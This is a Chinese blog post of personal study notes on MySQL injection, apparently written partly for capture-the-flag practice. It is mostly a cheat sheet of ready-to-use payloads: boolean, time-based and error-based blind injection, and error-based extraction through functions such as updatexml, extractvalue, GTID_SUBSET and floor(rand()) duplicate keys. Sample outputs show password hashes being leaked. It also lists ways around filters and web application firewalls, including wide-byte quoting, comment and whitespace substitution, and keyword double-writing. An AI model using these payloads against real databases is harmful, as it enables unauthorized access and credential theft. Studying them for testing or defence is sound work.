<!doctype html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>






<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.1" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="Hexo, NexT" />





  <link rel="alternate" href="/atom.xml" title="Yiruma" type="application/atom+xml" />




  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.1.1" />






<meta name="description" content="目前排版还比较乱，常见的姿势基本已经整理的比较全了，还在不断学习中。。。">
<meta name="keywords">
<meta property="og:type" content="article">
<meta property="og:title" content="mysql注入学习（持续保持更新）">
<meta property="og:url" content="https://someonesometimes.github.io/2017/07/23/mysql注入学习（持续更新中）/index.html">
<meta property="og:site_name" content="Yiruma">
<meta property="og:description" content="目前排版还比较乱，常见的姿势基本已经整理的比较全了，还在不断学习中。。。">
<meta property="og:updated_time" content="2018-04-20T13:19:02.251Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="mysql注入学习（持续保持更新）">
<meta name="twitter:description" content="目前排版还比较乱，常见的姿势基本已经整理的比较全了，还在不断学习中。。。">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    sidebar: {"position":"left","display":"post","offset":12,"offset_float":0,"b2t":false,"scrollpercent":false},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://someonesometimes.github.io/2017/07/23/mysql注入学习（持续更新中）/"/>





  <title>mysql注入学习（持续保持更新） | Yiruma</title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  















  
  
    
  

  <div class="container sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Yiruma</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于我
          </a>
        </li>
      
        
        <li class="menu-item menu-item-link">
          <a href="/link" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-link"></i> <br />
            
            友链
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  
  <div class="algolia-popup popup search-popup">
    <div class="algolia-search">
      <div class="algolia-search-input-icon">
        <i class="fa fa-search"></i>
      </div>
      <div class="algolia-search-input" id="algolia-search-input"></div>
    </div>

    <div class="algolia-results">
      <div id="algolia-stats"></div>
      <div id="algolia-hits"></div>
      <div id="algolia-pagination" class="algolia-pagination"></div>
    </div>

    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
  </div>




    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">
    <link itemprop="mainEntityOfPage" href="https://someonesometimes.github.io/2017/07/23/mysql注入学习（持续更新中）/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Yiruma">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Yiruma">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">mysql注入学习（持续保持更新）</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2017-07-23T13:53:32+08:00">
                2017-07-23
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="page-pv"><i class="fa fa-file-o"></i>
            <span class="busuanzi-value" id="busuanzi_value_page_pv" ></span>
            </span>
          

          

          

        </div>
      </header>
    

    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>目前排版还比较乱，常见的姿势基本已经整理的比较全了，还在不断学习中。。。</p>
<a id="more"></a>
<h2 id="sql盲注"><a href="#sql盲注" class="headerlink" title="sql盲注"></a>sql盲注</h2><h3 id="第一步：字符串截取函数"><a href="#第一步：字符串截取函数" class="headerlink" title="第一步：字符串截取函数"></a>第一步：字符串截取函数</h3><p><em>选取那个完全由过滤了什么符号决定，一般查看的有：函数名，逗号，空格</em><br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div></pre></td><td class="code"><pre><div class="line">substring((<span class="keyword">select</span> xxx) <span class="keyword">from</span> <span class="number">-1</span>|<span class="number">-2</span>|<span class="number">-3.</span>.. <span class="keyword">for</span> <span class="number">1</span>)</div><div class="line"><span class="keyword">substr</span>((<span class="keyword">select</span> xxx) <span class="keyword">from</span> <span class="number">-1</span>|<span class="number">-2</span>|<span class="number">-3.</span>.. <span class="keyword">for</span> <span class="number">1</span>)</div><div class="line"><span class="keyword">mid</span>((<span class="keyword">select</span> xxx) <span class="keyword">from</span> <span class="number">-1</span>|<span class="number">-2</span>|<span class="number">-3.</span>.. <span class="keyword">for</span> <span class="number">1</span>)</div><div class="line">过滤少的时候可以使用((<span class="keyword">select</span> xxx),<span class="number">1</span>|<span class="number">2</span>|<span class="number">3.</span>..,<span class="number">1</span>)的原始形式</div><div class="line"></div><div class="line"><span class="keyword">left</span>((<span class="keyword">select</span> xxx),<span class="number">2</span>)</div><div class="line"><span class="keyword">right</span>((<span class="keyword">select</span> xxx),<span class="number">2</span>)</div><div class="line"><span class="keyword">right</span>(<span class="keyword">left</span>((<span class="keyword">select</span> xxx),<span class="number">1</span>|<span class="number">2</span>|<span class="number">3.</span>..),<span class="number">1</span>)</div><div class="line"></div><div class="line"><span class="keyword">select</span> <span class="keyword">count</span>(<span class="number">1</span>) <span class="keyword">from</span> flag <span class="keyword">where</span> <span class="built_in">binary</span>(flag)&lt;<span class="number">0</span>x&#123;&#125;</div><div class="line">不按位截取了,每次将数据与一个长的字符串做对比 <span class="keyword">select</span> <span class="keyword">count</span>(<span class="number">1</span>) <span class="keyword">from</span> flag <span class="keyword">where</span> <span class="built_in">binary</span>(flag)&lt;<span class="number">0</span>x&#123;&#125;</div><div class="line">这种payload用的函数更少，也更短，通过表的长度变化作为回显数据的多种情况，比较适用于<span class="keyword">id</span>这种情况里，<span class="keyword">id</span>=<span class="number">0</span>,<span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>分别对应不同的值，但是在<span class="keyword">where</span>条件是字符串中，我们需要的是<span class="number">0</span>，<span class="number">1</span>两种bool条件，所以可能适用性就不太强了</div></pre></td></tr></table></figure></p>
<h3 id="第二步：将截取到的字符串段进行比较得到另一个数据"><a href="#第二步：将截取到的字符串段进行比较得到另一个数据" class="headerlink" title="第二步：将截取到的字符串段进行比较得到另一个数据"></a>第二步：将截取到的字符串段进行比较得到另一个数据</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">substring [=|like] [''|0xxxx]本身的结果就已经是用0，1 表示了</div><div class="line">(if(substring [=|like] [''|0xxxx], 0,1))</div><div class="line">(<span class="keyword">select</span> <span class="keyword">case</span> <span class="keyword">when</span> (<span class="keyword">substring</span> [=|<span class="keyword">like</span>] [<span class="string">''</span>|<span class="number">0</span>xxxx]) <span class="keyword">then</span> <span class="number">0</span> <span class="keyword">else</span> <span class="number">1</span> <span class="keyword">end</span>)</div><div class="line"></div><div class="line">使用<span class="built_in">binary</span>()来比较，来区分大小写</div></pre></td></tr></table></figure>
<h3 id="第三步：产生两种结果"><a href="#第三步：产生两种结果" class="headerlink" title="第三步：产生两种结果"></a>第三步：产生两种结果</h3><h4 id="基于bool的盲注"><a href="#基于bool的盲注" class="headerlink" title="基于bool的盲注"></a>基于bool的盲注</h4><p>判断结果的0或1或产生两种不同的回显结果，这就是bool型盲注思路<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">where user='' or [0|1] and ''=''  三者作为比较运算的条件</div><div class="line">where user='0'+[0|1]+'0'			三者作为运算结果，如果为'0'将匹配所有字符串，如果为'1'则匹配不了字符串，能够省略and等运算符</div></pre></td></tr></table></figure></p>
<h4 id="基于time的盲注"><a href="#基于time的盲注" class="headerlink" title="基于time的盲注"></a>基于time的盲注</h4><p>如果满足条件就sleep上一段时间，如果没有就不sleep，然后通过计算处理时间来得到两种回显结果<br>一般insert语句这种不会有文字回显的采用基于time盲注的两种情况<br><figure class="highlight"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">#需要注意一点的是，这里的重点不是让条件等式的结果为0或1，只要让等式中sleep的那一段运行就好</div><div class="line">where user='1' and [1,|sleep(5)]%23</div></pre></td></tr></table></figure></p>
<h4 id="基于报错的盲注"><a href="#基于报错的盲注" class="headerlink" title="基于报错的盲注"></a>基于报错的盲注</h4><p><strong>需要注意的一点是，既然数据库会报错回显，本质上和只有两种回显的情况是有不同的，在精心构造的语句+低版本的数据库中是可能直接拿到数据而不用盲注的，有关于报错的分类以及直接拿数据的方法我们在后面都会介绍到，这里只是盲注中对基于报错的使用</strong></p>
<figure class="highlight"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">#利用函数传入参数的格式错误报错</div><div class="line">select 1 from users where user='' or [0/1] and ST_LatFromGeoHash(version())%23;</div><div class="line">#利用exp函数的运算溢出可以造成报错，从710开始就会报错了，~0，，~1等等也都是可以的</div><div class="line">select 1 from users where user='' or [0/1] or exp(~0)</div><div class="line">#利用支持运算的最大值构造报错，这里的0就是按位取反得到的最大值，也就是18446744073709551615</div><div class="line">select 1 from users where user='' or [0/1] or ~0+1</div></pre></td></tr></table></figure>
<h3 id="盲注中可能用到的一些点"><a href="#盲注中可能用到的一些点" class="headerlink" title="盲注中可能用到的一些点"></a>盲注中可能用到的一些点</h3><ul>
<li><p>group_concat()将一列数据整合</p>
</li>
<li><p>获取数据库 <code>select database()</code></p>
</li>
<li><p>获取数据库中的表<br><code>select group_concat(table_name) from information_schema.tables where table_schema = &#39;news&#39;</code></p>
</li>
<li><p>获取表中的对应列<br><code>select group_concat(column_name) from information_schema.columns where table_name=&#39;flag&#39;</code> </p>
</li>
<li><p>最要紧的就是 = ‘i’或是0x表示，经常在payload里面写成 = {}，应该是 = ‘{}’</p>
</li>
<li><p>mysql的单字符比较中不区分大小写，应该使用binary()或者ascii()来区分大小写，测试ascii不管用，但是binary()可以。另外hex()函数用起来也很方便</p>
<p>另外select * from user where username=’admin’ and binary password=’xxx’这里就已经对password字段进行了二进制处理</p>
</li>
<li><p>有一些很有意思的地方(从Ben师傅的一次padding oracle attack结合sql注入的时候在想：在对回车也就是%0a, \n 字符进行getcipher的时候，是写成%0a，还是\n呢？%0a的话，对应加密出三个字符，而\n这对应一个回车字符)：<br>在传递不可显示字符的时候，就比如回车符吧，我们有两种传递方式———将回车符用url编码，也就是写做%0a的形式，在到服务端接收的时候就会自动进行urldecode所以又是回车符了，这时候可能我们会想：在写php代码的时候，将回车符号写作\n  0x0a  \x0a啊这些也都可以在sql中正常运行，那么在作为参数传递时这样写行不行呢，其实是不行的，因为你传过去再输出就可以看到，这些符号的意义并没有被转化为回车符，而只是单纯的几个字符而已。<br>有一种情况特殊些，我们将字符串可以用0xxxxx来代替，但是这并不是在php里面能对0x进行解析为对应的字符，而是因为mysql支持这种字符串的书写格式。</p>
</li>
</ul>
<h2 id="基于报错的注入-盲注部分前面提到了就不说了"><a href="#基于报错的注入-盲注部分前面提到了就不说了" class="headerlink" title="基于报错的注入(盲注部分前面提到了就不说了)"></a>基于报错的注入(盲注部分前面提到了就不说了)</h2><p><strong>首先来了解下如何从报错信息中直接拿到我们要的数据而不用盲注，之后在对报错注入的分类的介绍中我们会附加上如何不用盲注拿数据的payload</strong></p>
<p>让我们从exp(~0)这个报错函数开始考虑，报错时显示</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~(0))'</div></pre></td></tr></table></figure>
<p>看，回显中有显示~0的字样，然后我们可以想到如果是多层嵌套结构的话是分层次执行，如果我们用<code>select user()</code>来代替0，那么执行的顺序就是先进行<code>select user()</code>语句然后再将返回值带入exp函数中执行，最后报错的时候也就会将我们已经执行完毕的那条语句的执行结果输出出来，这时我们就看到了结果</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((<span class="keyword">select</span> <span class="string">'root@localhost'</span> <span class="keyword">from</span> dual)))<span class="string">'</span></div></pre></td></tr></table></figure>
<p>OK，了解了原理，我们接下来就要介绍报错盲注的分类了</p>
<h3 id="5-7版本以上mysql函数"><a href="#5-7版本以上mysql函数" class="headerlink" title="5.7版本以上mysql函数"></a>5.7版本以上mysql函数</h3><p>注意，我们下面介绍的这些函数在5.7版本中才有，而且经过测试能够回显敏感信息</p>
<p>而很多低版本的mysql都只能报错而在错误信息中不显示关键信息了，所以在高版本mysql中就推荐用这些函数</p>
<p>下面介绍的这些函数有个共性就是报错都是基于他们传入的参数格式错误而造成的，报错信息中就会展示出错误信息</p>
<p><code>ST_LatFromGeoHash()</code>函数，参数只能接受纯数字，我们用group_concat()引入逗号</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">select</span> ST_LatFromGeoHash((<span class="keyword">select</span> <span class="keyword">group_concat</span>(<span class="keyword">password</span>) <span class="keyword">from</span> <span class="keyword">user</span>));</div><div class="line">output:</div><div class="line">Incorrect geohash value: 'dd9d15d993d6f42f896ab4ba09a6a695,56057a4f4e475d73e48824acf8b54098,6b9412ec641f16892544154952fc8b1d' for function ST_LATFROMGEOHASH</div></pre></td></tr></table></figure>
<p><code>ST_LongFromGeoHash()</code>函数是一样的效果</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">select</span> ST_LongFromGeoHash((<span class="keyword">select</span> <span class="keyword">group_concat</span>(<span class="keyword">password</span>) <span class="keyword">from</span> <span class="keyword">user</span>));</div><div class="line">output:</div><div class="line">ERROR 1411 (HY000): Incorrect geohash value: 'dd9d15d993d6f42f896ab4ba09a6a695,56057a4f4e475d73e48824acf8b54098,6b9412ec641f16892544154952fc8b1d' for function ST_LONGFROMGEOHASH</div></pre></td></tr></table></figure>
<p>然后是<code>GTID_SUBSET()</code>函数，这个函数需要传两个参数，但是构造的时候注意到使用<code>select GTID_SUBSET((select group_concat(password) from user),&#39;&#39;);</code>并没有报错，然后就瞎猜了下，使用<code>concat</code>字符串链接将其处理一下，然后就成功报错了，迷。。。</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">select</span> GTID_SUBSET(<span class="keyword">concat</span>((<span class="keyword">select</span> <span class="keyword">group_concat</span>(<span class="keyword">password</span>) <span class="keyword">from</span> <span class="keyword">user</span>),<span class="string">''</span>),<span class="string">''</span>);</div><div class="line">output:</div><div class="line">ERROR 1772 (HY000): Malformed GTID <span class="keyword">set</span> specification <span class="string">'dd9d15d993d6f42f896ab4ba09a6a695,56057a4f4e475d73e48824acf8b54098,6b9412ec641f16892544154952fc8b1d'</span>.</div></pre></td></tr></table></figure>
<p><code>GTID_SUBTRACT()</code>函数与上一个是同样的触发方式</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">select</span> <span class="keyword">GTID_SUBTRACT</span>(<span class="keyword">concat</span>((<span class="keyword">select</span> <span class="keyword">group_concat</span>(<span class="keyword">password</span>) <span class="keyword">from</span> <span class="keyword">user</span>),<span class="string">''</span>),<span class="string">''</span>);</div><div class="line">output:</div><div class="line">ERROR 1772 (HY000): Malformed GTID <span class="keyword">set</span> specification <span class="string">'dd9d15d993d6f42f896ab4ba09a6a695,56057a4f4e475d73e48824acf8b54098,6b9412ec641f16892544154952fc8b1d'</span>.</div></pre></td></tr></table></figure>
<p><code>ST_PointFromGeoHash()</code>函数，需要两个参数</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">select</span> ST_PointFromGeoHash((<span class="keyword">select</span> <span class="keyword">group_concat</span>(<span class="keyword">password</span>) <span class="keyword">from</span> <span class="keyword">user</span>),<span class="number">1</span>);</div><div class="line">output:</div><div class="line">ERROR 1411 (HY000): Incorrect geohash value: 'dd9d15d993d6f42f896ab4ba09a6a695,56057a4f4e475d73e48824acf8b54098,6b9412ec641f16892544154952fc8b1d' for function st_pointfromgeohash</div></pre></td></tr></table></figure>
<h3 id="低版本报错方式"><a href="#低版本报错方式" class="headerlink" title="低版本报错方式"></a>低版本报错方式</h3><p>在低版本中，这些报错方式大都还是能将敏感信息回显出来的，高版本mysql里就不行了，我这里只有5.7版本的mysql，很多报错方式不会再回显敏感信息了，所以这里就只提供报错语句及原理介绍吧</p>
<p><strong>基于运算溢出的报错</strong></p>
<p>int型的加法运算溢出报错</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> <span class="keyword">user</span> <span class="keyword">where</span> ~<span class="number">0</span>+<span class="number">1</span>;</div><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> <span class="keyword">user</span> <span class="keyword">where</span> ~(<span class="keyword">select</span> <span class="keyword">group_concat</span>(<span class="keyword">password</span>) <span class="keyword">from</span> <span class="keyword">user</span>)+<span class="number">1</span>;</div></pre></td></tr></table></figure>
<p>exp()指数运算溢出，实际上在参数为710及以上时候就会溢出了</p>
<p>有个比较有意思的点，我在5.7版本的mysql测试中看到，回显信息包括了所有的字段名</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> <span class="keyword">user</span> <span class="keyword">where</span> <span class="keyword">exp</span>(<span class="number">710</span>);</div><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> <span class="keyword">user</span> <span class="keyword">where</span> <span class="keyword">exp</span>(~(<span class="keyword">select</span> <span class="keyword">group_concat</span>(<span class="keyword">password</span>) <span class="keyword">from</span> <span class="keyword">user</span>));</div></pre></td></tr></table></figure>
<p><strong>其他函数</strong></p>
<p>比较有意思的是，我在高版本mysql测试中，虽然不回显敏感信息了，但会爆出来表中所有的字段名。。。</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">select</span> multipoint((<span class="keyword">select</span> <span class="keyword">group_concat</span>(<span class="keyword">password</span>) <span class="keyword">from</span> <span class="keyword">user</span>));</div><div class="line">output:</div><div class="line">ERROR 1367 (22007): Illegal non geometric '(<span class="keyword">select</span> <span class="keyword">group_concat</span>(<span class="string">`blog`</span>.<span class="string">`user`</span>.<span class="string">`password`</span> separator <span class="string">','</span>) <span class="keyword">from</span> <span class="string">`blog`</span>.<span class="string">`user`</span>)<span class="string">' value found during parsing</span></div></pre></td></tr></table></figure>
<p>函数比较多，用法也都比较简单，这里就不一一举例了</p>
<ul>
<li>geometrycollection()</li>
<li>multipoint()</li>
<li>polygon()</li>
<li>multipolygon()</li>
<li>linestring() </li>
<li>multilinestring() </li>
</ul>
<p><strong>在高版本测试中也可以爆出敏感信息的函数</strong></p>
<p><code>updatexml()</code>函数是mysql中用来修改xml信息的函数</p>
<p><code>extractvalue()</code>函数是mysql中用来查询xml信息的函数</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">有时候可能爆不全，不全的时候用limit offset按行取吧</div><div class="line">有时候还容易出问题，尝试使用第二行的写法，将计算结果左右连接上~</div><div class="line"><span class="keyword">select</span> updatexml(<span class="number">1</span>,(<span class="keyword">select</span> <span class="keyword">group_concat</span>(<span class="keyword">password</span>) <span class="keyword">from</span> <span class="keyword">user</span>),<span class="number">1</span>);</div><div class="line"><span class="keyword">select</span> extractvalue(<span class="number">1</span>,<span class="keyword">concat</span>(<span class="number">0x7e</span>,(<span class="keyword">select</span> <span class="keyword">group_concat</span>(<span class="keyword">password</span>) <span class="keyword">from</span> <span class="keyword">user</span>),<span class="number">0x7e</span>));</div><div class="line">output:</div><div class="line">ERROR 1105 (HY000): XPATH syntax error: '~dd9d15d993d6f42f896ab4ba09a6a69</div></pre></td></tr></table></figure>
<p><strong>基于主键重复的报错</strong></p>
<p>是目前网上报错注入流传比较多的版本，好处是在高版本中依旧可以爆出错误，同时也没有使用updatexml函数报错限制报错长度为32的弊端</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">mysql&gt; select * from user where username='14' or (select count(*) from information_schema.tables group by concat(floor(rand(0)*2),(select password from user where username='admin')));</div><div class="line">output:</div><div class="line">ERROR 1062 (23000): Duplicate entry '16b9412ec641f16892544154952fc8b1d' for key '&lt;group_key&gt;'</div><div class="line">注意第一个数字1是要去掉的，为floor(rand(0)*2)的结果</div><div class="line"></div><div class="line">select count(*) from information_schema.tables group by concat(floor(rand(0)*2),(select password from user where username='admin'))</div></pre></td></tr></table></figure>
<p>原理分析：</p>
<p>在一条语句<code>select count(*) from user group by username</code>中，数据库的操作是建立一个虚表，比起原表多了一个count()列，group by的那个列变成了主键也就是<code>&lt;group_key&gt;</code>，之后从user表中一条条的取出来数据，在虚表中查找，基于group_key（在这里就是username）的值在虚表中是否已经存在，来决定是在count()列中加1还是新添加一个列。  考虑这个过程，我们使用<code>floor(rand(0)*2)</code>作为<code>&lt;group_key&gt;</code>的话，我们每次从user表里面提出来一条数据准备依据group_key进行插入，第一次计算结果是0，group_key为0，第二次是1，group_key为0，这里都没问题，只是在虚表中多了两个列，一个列名1，一个列名0，第三次插入的时候计算结果为1，这时再准备往虚表中插入虚拟的主键1，就会报主键重复的错误。</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">Duplicate entry '16b9412ec641f16892544154952fc8b1d' for key '&lt;group_key&gt;'</div></pre></td></tr></table></figure>
<h2 id="sql过滤统计"><a href="#sql过滤统计" class="headerlink" title="sql过滤统计"></a>sql过滤统计</h2><p>反正过滤吧，不是想办法绕过，就是再找一个相同功能的写法来替换<br>先放上一些比较经典的：</p>
<ul>
<li><a href="https://paper.seebug.org/218/" target="_blank" rel="external">我的WafBypass之道</a></li>
</ul>
<p><strong>过滤单引号</strong></p>
<ul>
<li>在数据库为gbk编码下可以考虑宽字节注入%df%27来用%df吃掉\</li>
<li>因为单引号被过滤无法<code>where user=&#39;admin&#39;</code>的时候，用0x写法来代替’’写法</li>
</ul>
<p><strong>过滤空格</strong><br>本质上就是用一些无法融入原写法语义的符号放到那里起到空格的分隔作用</p>
<ul>
<li>使用<code>() 或者 反引号</code>来做分隔,形如select(*)from(user)的写法，</li>
<li>sqlmap中space2hash.py的方法，用%23xxx%0a来做空格</li>
<li>使用<code>/**/</code>来做分隔</li>
<li>使用%0a来做分隔</li>
<li>and可以用&amp;&amp;代替 or可以用||代替  这样不仅不需要空格，连and or都不需要</li>
</ul>
<p><strong>过滤某些sql语句的关键字</strong></p>
<ul>
<li><code>/*!*/</code>来在php中注释过去，但是mysql中会正常执行，形如<code>/*!select*/ flag /*!from*/ flag</code></li>
<li>中间插入<code>%0a  %0b  %00  /**/</code>这些,形如<code>se%0blect fl/**/ag from flag</code>，但有一点要提醒的是，<code>sel/**/ect</code>这种写法并不是说可以绕过检测而且mysql可以执行，<code>%0b /**/</code>这些字符在sql语句中是存在的，在php那一层就会剔除掉</li>
<li>考虑大小写绕过SeLect</li>
<li>最常见的双写绕过的可能千万不要忘了尝试下 <code>selselelctect</code></li>
</ul>
<p><strong>过滤某些符号</strong><br>符号的过滤与关键字过滤不同，大部分情况无法进行过滤绕过，多为寻求符号的替代品</p>
<ul>
<li>使用greatest来替代大小写符号<code>ascii(mid(user(),1,1)) &lt; 150</code>–&gt;<code>greatest(ascii(mid(user(),1,1)),150)=150</code></li>
<li>过滤了逗号，使用<code>substring((select xxx) from -1|-2|-3... for 1)</code>来代替<code>((select xxx),1|2|3...,1)</code></li>
<li>过滤了=，其实=的替代品有很多：like,&lt;,&gt;,^,-其实都可以做运算生成bool结果，另外&lt;&gt;都有等价的函数表示，另外in函数也可以的 select password in (‘’,’’,’’)</li>
<li>ascii() hex() 可以获得字符的数字形式，需要注意的是hex()返回的是6B这种字符串，最好不要做math运算，因为6B会变成6，所以一般推荐ascii()</li>
<li>char()  将ascii对应的转化为字符</li>
</ul>
<p><strong>末尾截断可用的注释（然而我比较习惯用’’=’）</strong></p>
<ul>
<li><code>%23  也就是#</code></li>
<li><code>--+</code>  注意这里应该用+来表示最后一个空格字符，因为很可能空格没有被传过去的</li>
<li><code>;%00</code></li>
<li><code>/*</code>没有测试成功</li>
<li>反撇号 没有测试成功</li>
</ul>
<p><strong>过滤某些函数</strong><br>这不是大事，基本上都能找到相同功能的函数来代替，mysql函数那么多。。。</p>
<p><a href="https://dev.mysql.com/doc/refman/8.0/en/functions.html" target="_blank" rel="external">https://dev.mysql.com/doc/refman/8.0/en/functions.html</a></p>
<p><strong>一些字段关键字被过滤</strong></p>
<ul>
<li>和关键子过滤一样，使用<code>/**/ %0b %0a</code>这些来中间断一下</li>
<li>大小写也是没有问题的，反正mysql对大小写也不敏感</li>
<li>使用concat(‘adm’+’in’)就可以，但注意mysql中写成’adm’+’in’的结果是0。。。小心不要错了</li>
<li>limit被禁用，也不能使用group_concat()，这时候就要使用where条件将查询结果限制在一行中，比如可以使用like方法</li>
</ul>
<p><strong>waf的缓冲区溢出利用</strong></p>
<p>因为waf多是基于C语言编写的，所以如果输入的参数大于缓冲区的时候并不会报错而只是检查缓冲区内的部分，溢出的部分就不会进行检查</p>
<p>这里提供两种思路：</p>
<ul>
<li><p>如果参数使用post上传，我们提交两个同名的参数，在php处理策略上，同名参数会以第二个为准，而waf可能会两个都进行处理，这样我们第一个参数提交一个文件来耗尽waf缓存，第二个参数就不会检查了</p>
